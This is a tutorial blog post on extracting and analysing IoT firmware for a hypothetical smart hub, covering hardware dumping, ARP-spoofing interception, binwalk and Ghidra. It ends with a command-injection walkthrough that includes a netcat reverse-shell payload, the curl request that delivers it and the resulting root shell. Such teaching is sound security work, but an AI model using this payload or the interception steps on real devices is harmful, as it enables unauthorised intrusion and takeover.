DEV Community

Picoable
Picoable

Posted on • Originally published at hacking.picoable.com

A Practical Guide to Extracting and Analyzing IoT Firmware

Introduction

The Internet of Things (IoT) has woven itself into the fabric of our daily lives, from smart home hubs and security cameras to industrial control systems. While these devices offer incredible convenience, they also represent a vast and often-vulnerable attack surface. Each device runs on firmware—the low-level software that controls its hardware. For a security researcher or bug bounty hunter, this firmware is a treasure map leading to potential vulnerabilities.

This guide provides a practical walkthrough of the firmware analysis process. Our goal is to demystify IoT hacking, transforming it from a perceived dark art into a systematic methodology. We'll cover extracting firmware, performing static and dynamic analysis, and identifying and exploiting a common vulnerability.

For our example, we'll target a hypothetical "AI-Powered Smart Hub." This device claims to personalize user experiences by learning from user behavior, implying complex on-device logic and cloud communication—a rich environment for security flaws.

Phase 1: Firmware Extraction

Before we can analyze anything, we need the firmware itself. This is often the first and most challenging hurdle. Here are the primary methods for getting your hands on the binary.

Physical Methods

If you have physical access to the device, you can often extract the firmware directly from the memory chip.

  1. JTAG/SWD Interfaces: Many devices have exposed debugging ports like JTAG (Joint Test Action Group) or SWD (Serial Wire Debug) on their Printed Circuit Board (PCB). These ports provide low-level access to the CPU and memory.

    • Tools: J-Link, OpenOCD, Bus Pirate.
    • Process: Identify the JTAG/SWD pins (TDI, TDO, TCK, TMS, and sometimes TRST) on the PCB, connect your adapter, and use a debugger like GDB to halt the processor and dump the memory contents.
  2. Direct Flash Memory Dumping: The firmware is typically stored in a NOR or NAND flash chip.

    • Tools: Logic analyzer (e.g., Saleae), chip programmer (e.g., CH341A), hot-air rework station.
    • Process: Solder wires to the chip's pins while it's on the board (in-system programming) or, for a cleaner read, desolder the chip entirely. Connect it to a programmer and read its contents directly. This bypasses any software-level security.

Remote Methods

If you can't open the device, you can often capture the firmware as it travels over the network.

  1. OTA (Over-the-Air) Updates: Most IoT devices update themselves by downloading firmware from a vendor's server.

    • Tools: mitmproxy, Wireshark.
    • Process: Position yourself as a man-in-the-middle (e.g., using ARP spoofing) and intercept the device's network traffic. When an update is initiated, you can capture the HTTP/HTTPS request and download the firmware file yourself. These files are often encrypted, but sometimes they are not.
  2. Exposed Services & Backdoors: Poorly configured devices might expose services that let you download the firmware.

    • Tools: nmap, an FTP client, a web browser.
    • Process: Scan the device for open ports. You might find an unprotected FTP server, an unauthenticated web endpoint, or even a TFTP server hosting the firmware image for recovery purposes.

Phase 2: Static Analysis - Taking the Firmware Apart

Once you have the firmware file (e.g., firmware.bin), it's time to dissect it without running it.

Initial Triage with binwalk

binwalk is an indispensable tool for analyzing binary blobs. It scans for signatures of different file types, filesystems, and executable code.

# Scan the firmware for known file types and decompress/extract them
binwalk -eM firmware.bin
Enter fullscreen mode Exit fullscreen mode

This command might reveal and extract a complete Linux filesystem, such as SquashFS or CramFS. Suddenly, you have the device's entire root directory, ready for inspection.

Analyzing the Filesystem

With the filesystem extracted, you can start hunting for sensitive information:

  • Hardcoded Secrets: Look for API keys, passwords, and private certificates. A simple grep can be surprisingly effective.

    # Search for anything that looks like an AWS access key
    grep -r "AKIA" /path/to/extracted/filesystem/
    
  • Scripts and Configuration: Examine shell scripts (.sh) and Python scripts (.py) for logic flaws. A tool like bandit can automatically find dangerous patterns in Python code, such as the use of os.system or exec.

  • Binaries: The core application logic usually resides in compiled binaries in /usr/bin or /sbin. These are your primary targets for reverse engineering.

Reverse Engineering Binaries with Ghidra

Ghidra is a free, powerful software reverse engineering suite developed by the NSA.

  1. Load the Binary: Import your target binary (e.g., the main /usr/sbin/smarthub_server) into a new Ghidra project. Ghidra will automatically analyze it, identifying functions and cross-references.

  2. Find Interesting Functions: A great way to start is by searching for interesting strings in the "Defined Strings" window. Look for terms like "password," "secret," "API_KEY," http://, or error messages. Right-click a string and find its cross-references to see where in the code it's used.

  3. Analyze Logic: Ghidra's decompiler will show you a C-like representation of the assembly code, making it much easier to understand.

    • Look for Weak Cryptography: Are they rolling their own encryption? Is there a custom integrity check? For example, you might find code that hashes parts of the firmware to verify its integrity, similar to this:
      # Example of a firmware integrity check
      sha256 = hashlib.sha256()
      for tensor in reader.tensors:
          # ... skip some tensors ...
          sha256.update(tensor.data.data)
      # The final hash is then compared against a known value
    

    Understanding this routine is key to patching the binary and recalculating the hash to bypass the check.

    • Identify Dangerous Functions: Pay close attention to calls to C functions known to be unsafe, like strcpy, sprintf, gets, and system. These are classic sources of buffer overflows and command injection vulnerabilities.

Phase 3: Dynamic Analysis - Poking the Live System

Static analysis tells you what the code can do. Dynamic analysis tells you what it actually does when it runs.

Environment Setup

  • Network Interception: The easiest way to analyze network traffic is to force the IoT device to route its traffic through your analysis machine. Set up your machine as a Wi-Fi hotspot and run mitmproxy or Wireshark.
  • Emulation: For ARM or MIPS binaries, you can often run them directly on your x86 machine using QEMU's user-space emulation (qemu-arm-static). This lets you run and debug the binary without needing the physical device.

Analyzing Network Traffic

With mitmproxy running, you can see all HTTP/HTTPS requests the device makes. This can reveal:

  • Undocumented cloud APIs.
  • Unencrypted data transmissions containing sensitive information like usernames or location data.
  • Real-time communication protocols like WebSockets or MQTT.

For example, you might discover the device uses a WebSocket for real-time status updates. The intercepted communication could look like this, revealing the protocol's structure:

CLIENT -> SERVER: {"event": "subscribe_to_research", "data": {"research_id": "user_activity_model"}}
SERVER -> CLIENT: {"event": "research_progress_user_activity_model", "data": {"progress": 10, "message": "Analyzing data..."}}
Enter fullscreen mode Exit fullscreen mode

This gives you a blueprint to start fuzzing the endpoint. What happens if you send a non-existent research_id? Or a 10,000-character string? Or a SQL injection payload?

Vulnerability Walkthrough: Unauthenticated Command Injection

Let's tie it all together with a concrete example.

  1. Static Discovery: While analyzing the smarthub_server binary in Ghidra, we find a function that handles fetching content from a URL provided by the user (e.g., to set a custom dashboard background). The decompiled C code looks worryingly like this:

    void fetch_background(char *user_url) {
      char command[256];
      // DANGER: user_url is not sanitized!
      sprintf(command, "curl -o /tmp/background.jpg '%s'", user_url);
      system(command);
    }
    

    The code uses sprintf to construct a shell command with unsanitized user input and then executes it with system. This is a textbook command injection vulnerability.

  2. Dynamic Confirmation: We use our mitmproxy setup to find the API endpoint that triggers this function. We see a POST request to /api/set_dashboard_background with a JSON body: {"url": "http://example.com/image.jpg"}.

  3. Exploitation: We can now craft a malicious payload. We'll use Burp Suite Repeater or a simple curl command to send a crafted URL that breaks out of the original command and executes our own. Our payload will start a reverse shell back to our machine.

    The payload: ';/bin/busybox nc 192.168.1.100 4444 -e /bin/sh;'

*   The first `'` closes the string for the `curl` command.
*   The `;` separates shell commands.
*   We then run `nc` (netcat) to connect back to our attacker machine (`192.168.1.100` on port `4444`) and execute a shell (`-e /bin/sh`).
*   The final `;` ensures any trailing characters from the original command are treated as a separate, likely-to-fail command.
Enter fullscreen mode Exit fullscreen mode
  1. Getting the Shell:

    • On our attacker machine, we start a listener:
      nc -lvp 4444
    
*   We send the malicious request to the device:
Enter fullscreen mode Exit fullscreen mode
  ```bash
  curl -X POST http://192.168.1.50/api/set_dashboard_background \
  -H "Content-Type: application/json" \
  -d '{"url": "';/bin/busybox nc 192.168.1.100 4444 -e /bin/sh;'"}'
  ```
Enter fullscreen mode Exit fullscreen mode
*   Our listener catches the incoming connection, and we have a root shell on the device.
Enter fullscreen mode Exit fullscreen mode
  ```
  listening on [any] 4444 ...
  connect to [192.168.1.100] from (UNKNOWN) [192.168.1.50] 48172
  # whoami
  root
  ```
Enter fullscreen mode Exit fullscreen mode
  Game over.
Enter fullscreen mode Exit fullscreen mode




Mitigation and Conclusion

Mitigation

The discovered vulnerability could be patched by adhering to secure coding principles:

  1. Avoid system(): Never build shell commands with user-supplied data. Use library functions that don't invoke a shell, such as libcurl for making HTTP requests in C.
  2. Input Validation: Strictly validate all user input. For a URL, ensure it conforms to the HTTP/HTTPS schema and doesn't contain shell metacharacters.
  3. Principle of Least Privilege: The web server process should not run as root. A dedicated, unprivileged user would limit an attacker's capabilities even if they achieve code execution.

Conclusion

Analyzing IoT firmware is a methodical process of peeling back layers. We started by physically or remotely acquiring the code, then used static analysis tools like binwalk and Ghidra to understand its structure and logic. Finally, we used dynamic analysis with mitmproxy to observe its real-world behavior, leading us to a critical vulnerability.

The world of IoT security is vast and growing. By mastering this cycle of extraction, static analysis, and dynamic analysis, you can effectively audit these devices, uncover significant vulnerabilities, and contribute to a more secure connected world. Hacking isn't magic; it's a systematic process of understanding a system so deeply that you can make it do things it was never designed to do.

Top comments (0)